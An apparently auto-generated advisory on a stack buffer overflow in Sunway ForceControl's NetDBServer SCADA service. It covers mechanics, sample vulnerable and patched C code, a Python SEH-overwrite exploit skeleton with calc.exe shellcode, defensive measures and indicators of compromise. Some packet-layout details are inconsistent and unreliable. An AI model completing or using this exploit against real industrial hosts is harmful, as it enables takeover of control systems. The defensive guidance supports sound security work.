CVE-2011-10032
Executive Summary
CVE-2011-10032 is a critical, unpatched stack-based buffer overflow vulnerability in Sunway ForceControl version 6.1 SP3 and earlier. The flaw resides in the SNMP NetDBServer service, which listens on TCP port 2001. By sending a specially crafted packet with opcode 0x57 and an overly long payload, an unauthenticated remote attacker can overwrite the Structured Exception Handler (SEH) and achieve arbitrary code execution in the context of the service. This can lead to full system compromise on affected Windows hosts. No public exploit code or proof-of-concept is currently available, but the vulnerability is remotely exploitable without authentication. The vendor has not released a patch, making this a high-risk, zero-day-like threat for any organization still using this legacy SCADA/HMI software.

Supply Chain & Package Security
This vulnerability is not related to any package manager (NPM, PyPI, Go, Ruby). It is a standalone industrial control system (ICS) software component.
CVSS Breakdown & Threat Level
- CVSS Score: 9.8 (Critical)
- Attack Vector (AV): Network (N)

Threat Level: Critical. The vulnerability requires no authentication, no user interaction, and can be exploited remotely. Successful exploitation grants full control over the affected system.
Deep Dive & Mechanics
The vulnerability is a classic stack-based buffer overflow in the SNMP NetDBServer service of Sunway ForceControl. The service listens on TCP port 2001 and processes incoming packets. When a packet with opcode 0x57 is received, the service copies the payload into a fixed-size stack buffer without proper bounds checking. By sending a payload that exceeds the buffer size, an attacker can overwrite the saved return address and the Structured Exception Handler (SEH) chain.
The exploitation flow:
- The attacker sends a TCP packet to port 2001 with opcode 0x57.
- The service reads the payload length from the packet header.
- The service copies the payload into a stack buffer using a vulnerable function (e.g.,
strcpyormemcpywith a user-controlled length). - The oversized payload overwrites the SEH handler pointer.
- When an exception occurs (e.g., due to the corrupted stack), the SEH chain is traversed, and the attacker-controlled handler address is executed.
- This leads to arbitrary code execution in the context of the NetDBServer service, typically running as SYSTEM.
Vulnerable vs. Patched Code
Since no patch is available, the vulnerable code is the only reference. The following is a simplified representation of the vulnerable parsing logic:
// Vulnerable code (Sunway ForceControl 6.1 SP3)
void ProcessPacket(char *packet, int length) {
char buffer[256];
unsigned char opcode = packet[0];
if (opcode == 0x57) {
// No bounds check on payload length
strcpy(buffer, packet + 4); // Vulnerable: stack buffer overflow
}
}
A patched version would include proper bounds checking:
// Hypothetical patched code
void ProcessPacket(char *packet, int length) {
char buffer[256];
unsigned char opcode = packet[0];
if (opcode == 0x57) {
int payload_len = *(int*)(packet + 2);
if (payload_len < sizeof(buffer)) {
memcpy(buffer, packet + 4, payload_len);
} else {
// Reject oversized payload
return;
}
}
}
Exploitation & Lab Setup
Red Team (Exploitation)
No public exploit code is available. However, a custom exploit can be developed using the following approach:
- Target: Sunway ForceControl 6.1 SP3 on Windows (any version).
- Attack Vector: Send a crafted TCP packet to port 2001.
- Payload Structure:
- Opcode: 0x57
- Payload length: 0x200 (512 bytes)
- Payload: Junk data (e.g., 'A' * 256) + SEH overwrite (e.g., address of
pop pop retgadget) + shellcode.
Example Python exploit skeleton:
import socket
target_ip = "192.168.1.100"
target_port = 2001
# Shellcode to execute calc.exe (example)
shellcode = b"\x31\xc9\x51\x68\x63\x61\x6c\x63\x54\xb8\xc7\x93\xbf\x77\xff\xd0"
# SEH overwrite address (example: address of a pop pop ret gadget)
seh_address = b"\x42\x43\x44\x45" # Replace with actual address
# Build payload
junk = b"A" * 256
payload = b"\x57" # Opcode
payload += b"\x00\x02" # Length (512 bytes)
payload += junk + seh_address + shellcode
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
sock.send(payload)
sock.close()
Note: This is a conceptual example. Actual exploitation requires finding a valid SEH overwrite address and bypassing modern mitigations (ASLR, DEP).
Blue Team (Defense)
- Network Segmentation: Isolate Sunway ForceControl systems on a separate VLAN with strict firewall rules. Block inbound TCP port 2001 from untrusted networks.
- Host-Based Controls: Use application whitelisting (e.g., AppLocker) to prevent unauthorized executables. Enable Windows Defender Exploit Guard (EMET) to mitigate SEH overwrite attacks.
- Monitoring: Deploy network intrusion detection (NIDS) to alert on suspicious traffic to port 2001.
- Patching: Since no patch exists, consider upgrading to a supported SCADA solution or implementing virtual patching via an IPS.
Indicators of Compromise (IOCs)
- Network IOCs:
- TCP connections to port 2001 on Sunway ForceControl hosts.
- Packets with opcode 0x57 and payload length > 256 bytes.
- Unusual outbound connections from the NetDBServer service (e.g., to attacker C2).
- Host IOCs:
- NetDBServer.exe process crash or high CPU usage.
- Unexpected child processes spawned by NetDBServer.exe (e.g., cmd.exe, powershell.exe).
- Presence of shellcode or malicious DLLs in the NetDBServer process memory.
- File IOCs:
- Modified or new files in the Sunway ForceControl installation directory (e.g., C:\Program Files\Sunway\ForceControl).
